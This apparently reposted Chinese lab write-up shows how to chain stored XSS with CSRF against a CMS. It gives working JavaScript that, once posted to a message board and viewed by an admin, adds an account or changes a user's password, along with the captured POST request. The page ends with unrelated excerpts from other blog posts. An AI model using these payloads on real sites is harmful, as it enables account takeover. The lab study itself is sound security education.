当前位置：首页 > news >正文

CSRF与XSS结合利用

news 2026/5/21 9:05:38

文章目录

修改cms网站后台管理员密码
成功登录
总结

修改cms网站后台管理员密码

CSRF和XSS结合的JS代码：

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.4.7.130/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=ajest&password=123.com&password2=123.com&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>

登录cms管理员后台，创建一个新账户：

在这里插入图片描述

修改密码并用bp抓包，抓到的post请求包如下：

POST /cms/admin/user.action.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/cms/admin/user.add.php?act=edit&userid=30
Cookie: username=admin; userid=1; PHPSESSID=he767h7viun2ig25ega7euu4l2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: frame
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1act=edit&password=111111&password2=111111&button=%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7&userid=30

根据上述请求包的数据修改JS代码的act的password字段，修改地址，修改content-type字段：

<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://127.0.0.1/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=edit&password=12345&password2=12345&button=%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7&userid=30");
</script>

打开cms网页，在留言板中添加这段js代码并留言，提交：

在这里插入图片描述

当管理员在后台审核，看到这段留言时已经被攻击，EMT用户的密码已经被修改：

在这里插入图片描述

后台尝试登录EMT账户，发现不成功，密码已经被修改：

在这里插入图片描述

成功登录

用之前抓包修改的密码发现果然可以登录：

在这里插入图片描述

总结

我们先用bp在后台管理员修改账户密码的时候抓到了它的post请求包，然后将password字段修改后放入一段JS代码中，这段代码是XSS和CSRF漏洞的结合，接着我们找到cms网页中存在XSS漏洞的位置，即留言板，利用留言板注入JS代码，当后台管理审核留言时看到我们的留言，就会被攻击，使得网站的状态被改变，从而使EMT用户的密码被修改，这就是XSS和CSRF的结合。

CSRF与XSS结合利用

文章目录修改cms网站后台管理员密码成功登录总结修改cms网站后台管理员密码 CSRF和XSS结合的JS代码： <script> xmlhttp new XMLHttpRequest(); xmlhttp.open("post","http://10.4.7.130/cms/admin/user.action.php",false); xmlhttp…...

编程日记 2023/9/2 7:15:01

【爬虫】实验项目一：文本反爬网站的分析和爬取

目录一、实验目的二、实验预习提示编辑三、实验内容四、实验要求五、实验过程 1. 基本要求： 2. 改进要求A 3. 改进要求B: 六、资料 1.实验框架代码： 2.OpenSSL：Win32/Win64 OpenSSL Installer for Windows - Shining Light…...

编程日记 2023/9/2 7:14:00

DEAP库文档教程二-----创建类型

本节将展示如何通过creator创建类型以及如何使用toolbox进行初始化。 1、Fitness 已经提供的Fitness类是一个抽象类，它需要weight来使得它成为一个函数。一个最小化的适应度是通过负权重构建的，而一个最大化适应度则需要正权重。 creator.create(&quo…...

编程日记 2023/9/2 7:12:57

Axure RP美容美妆医美行业上门服务交互原型图模板源文件

Axure RP美容美妆医美行业上门服务交互原型图模板源文件，原型内容属于电商APP，区别于一般电商，它的内容是‘美容美发美妆等’上门服务等。大致流程是线上买单，线下实体店核销消费。附上预览演示：axure9.com/mobile/73…...

编程日记 2023/9/2 7:11:57

【SpringBoot】用SpringBoot代码详细解释＜List＞的用法

在Spring Boot应用程序中，我们可以使用Java集合框架中的List接口来存储并操作一组数据。 List是Java集合框架中的一种数据结构，用于存储一组有序的元素。使用List可以方便地向其中添加、删除或者修改元素，也可以通过下标或者迭代器遍历其中的…...

编程日记 2023/9/2 7:10:54

HRS--人力资源系统（Springboot+vue）--打基础升级--（六）分页查询 + 重置按钮

一：先弄个简单的重置按钮 1.界面设计就放在搜索框同一列的位置 2. 在点击重置按钮时，清空搜索框内的内容，同时触发一次无条件查询(这个写法有bug，下面会有说明) 二：做分页在MyBatis中，有多种方法可以实现分…...

编程日记 2023/9/2 7:09:53

JavaScript设计模式（二）——简单工厂模式、抽象工厂模式、建造者模式

个人简介 👀个人主页： 前端杂货铺 🙋‍♂️学习方向： 主攻前端方向，正逐渐往全干发展 📃个人状态： 研发工程师，现效力于中国工业软件事业 🚀人生格言： 积跬步…...

编程日记 2023/9/2 7:08:52

DEAP库文档教程五----计算统计

本小结将重点围绕模型在计算统计方面的问题，进行详细的论述 1、Computing Statistics 通常情况下，我们想要在优化过程中编辑数据。Statistic模块可以在任何设计好的目标上改变一些本不可改变的数据。为了达到这个目的，需要使用与工具箱中完…...

编程日记 2023/9/2 7:07:50

新型安卓恶意软件使用Protobuf协议窃取用户数据

近日有研究人员发现，MMRat新型安卓银行恶意软件利用protobuf 数据序列化这种罕见的通信方法入侵设备窃取数据。趋势科技最早是在2023年6月底首次发现了MMRat，它主要针对东南亚用户，在VirusTotal等反病毒扫描服务中一直未被发现。虽然研究…...

编程日记 2023/9/2 7:06:49

【AI数字人】如何基于DINet+Openface自训练AI数字人

文章目录 OpenFace环境配置提取特征特征处理DINet推理数据前处理训练frame training stageclip training stage参考DINet训练/推理过程中需要用到OPenFace的人脸数据，所以使用DINet训练定制数字人，需要配置OPenFace和DINet两个项目的环境。我是使用conda创建了一个dinet的虚拟…...

编程日记 2023/9/2 7:05:47

Stable Diffusion 多视图实践

此教程是基于秋叶的webui启动器 1.Stable Diffsuion 使用多视图需要准备一个多角度open pose 图我给大家提供一个可使用的。 2.需要添加图片到到controlnet当中，不要选择预处理器，选择模型为openpose的模型，然后需要点选同步图片尺寸。 3.然后填写关键字可以参照一下这个…...

编程日记 2023/9/2 7:04:46

【实操干货】如何开始用Qt Widgets编程？（四）

Qt 是目前最先进、最完整的跨平台C开发工具。它不仅完全实现了一次编写，所有平台无差别运行，更提供了几乎所有开发过程中需要用到的工具。如今，Qt已被运用于超过70个行业、数千家企业，支持数百万设备及应用。在本文中&#xff0…...

编程日记 2023/9/2 7:03:43

解决window安装docker报错问题

第一次打开Docker Desktop后提示错误试了网上版本都没用，后面发现是电脑没有下载相关虚拟机： 先点击链接下载wsl2，下载后命令行执行：dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /…...

编程日记 2023/9/2 7:02:42

茄子科技面试题

1、RPC的重要组成有哪些？ 客户端（Client）：发起RPC请求的部分。客户端包含代表远程过程的存根（stub），它提供与本地过程相同的接口。服务器（Server）：接受RPC请…...

编程日记 2023/9/2 7:01:40

1、导出csv表 from settings_Address import * from sqlalchemy import create_engine, MetaData import pandas as pd def create_conn(Postgis_user,Postgis_password,Postgis_host,Postgis_port,dbname_PG):# return create_engine(PostgispyPostgis://{}:{}{}:{}/{}.forma…...

编程日记 2023/9/2 7:00:38

MySQL 特殊字符

文章目录 1.注释符2.字符串符3.反引号4.模式匹配通配符转义符参考文献 1.注释符 SQL 注释是用来在 SQL 语句中添加对代码的解释说明。SQL 支持两种类型的注释符号。单行注释：使用两个连续的减号（–）表示。减号后面的内容将被视为注释&…...

编程日记 2023/9/2 6:59:37

Chrome自动升级了,找不到最新版本的webdriver怎么办?

Chrome自动升级了,找不到最新版本的webdriver怎么办? 背景解决办法背景我用Selenium开发了Facebook和Linkedin爬虫，有些新需求要调一下，今天启动selenium时有报错，报错如下：selenium.common.exceptions.SessionNotCreatedExce…...

编程日记 2023/9/2 6:58:36

网络编程套接字(3): 简单的TCP网络程序

文章目录网络编程套接字(3)4. 简单的TCP网络程序4.1 服务端创建(1) 创建套接字(2) 绑定端口(3) 监听(4) 获取新连接(5) 处理读取与写入 4.2 客户端创建(1)连接服务器 4.3 代码编写(1) v1__简单发送消息(2) v2_多进程版本(3) v3_多线程版本(4) v4_线程池版本网络编程套接字(3)…...

编程日记 2023/9/2 6:57:35

springMVC之拦截器

文章目录前言一、拦截器的配置二、拦截器的三个抽象方法三、多个拦截器的执行顺序总结前言拦截器一、拦截器的配置 SpringMVC中的拦截器用于拦截控制器方法的执行 SpringMVC中的拦截器需要实现HandlerInterceptor SpringMVC的拦截器必须在SpringMVC的配置文件中进行配置&…...

编程日记 2023/9/2 6:56:34

docker搭建个人网盘和私有仓库Harbor

目录 1、使用mysql:5.7和 owncloud 镜像，构建一个个人网盘 2、安装搭建私有仓库 Harbor 1、使用mysql:5.7和owncloud，构建一个个人网盘 1.拉取mysql:5.6镜像，并且运行mysql容器 [rootnode8 ~]# docker pull mysql:5.7 [rootnode8 ~]# doc…...

编程日记 2023/9/2 6:55:33